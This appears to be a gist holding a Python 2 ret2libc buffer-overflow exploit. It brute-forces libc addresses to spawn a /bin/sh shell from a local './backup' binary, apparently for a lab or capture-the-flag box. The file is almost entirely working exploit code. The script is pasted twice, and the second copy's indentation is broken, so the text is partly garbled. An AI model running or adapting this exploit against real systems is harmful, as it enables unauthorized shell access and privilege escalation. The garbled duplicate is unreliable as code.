ShivamShrirao/node.py Secret

## node.py
from subprocess import call
from struct import pack
key= "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474"
junk = "A"*512					 #junk padding
libc = 0xf7dc5000				 #libc base address. Take any from ldd ./backup.
system = pack("I",libc+0x3c7d0)			 #system offset added to libc base and convert to little Endian
exit = pack("I",libc+0x2fb10)			 #exit offset added to libc base
sh = pack("I",libc+0x17888a)			 #/bin/sh offset added to libc base
payload = junk + system + exit + sh		 #final payload
for i in range(512):			  	 #for loop to execute 512 times
	print i 			 	 #counter
	ret=call(["./backup","aaa",key,payload]) #call ./backup with proper arguments
	if (not ret):				 #break on successful exploit
           print "**************"
           break
	else:
		print "Exploit failed !"
	from subprocess import call
	from struct import pack
	key= "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474"
	junk = "A"*512 #junk padding
	libc = 0xf7dc5000 #libc base address. Take any from ldd ./backup.
	system = pack("I",libc+0x3c7d0) #system offset added to libc base and convert to little Endian
	exit = pack("I",libc+0x2fb10) #exit offset added to libc base
	sh = pack("I",libc+0x17888a) #/bin/sh offset added to libc base
	payload = junk + system + exit + sh #final payload
	for i in range(512): #for loop to execute 512 times
	print i #counter
	ret=call(["./backup","aaa",key,payload]) #call ./backup with proper arguments
	if (not ret): #break on successful exploit
	print "**************"
	break
	else:
	print "Exploit failed !"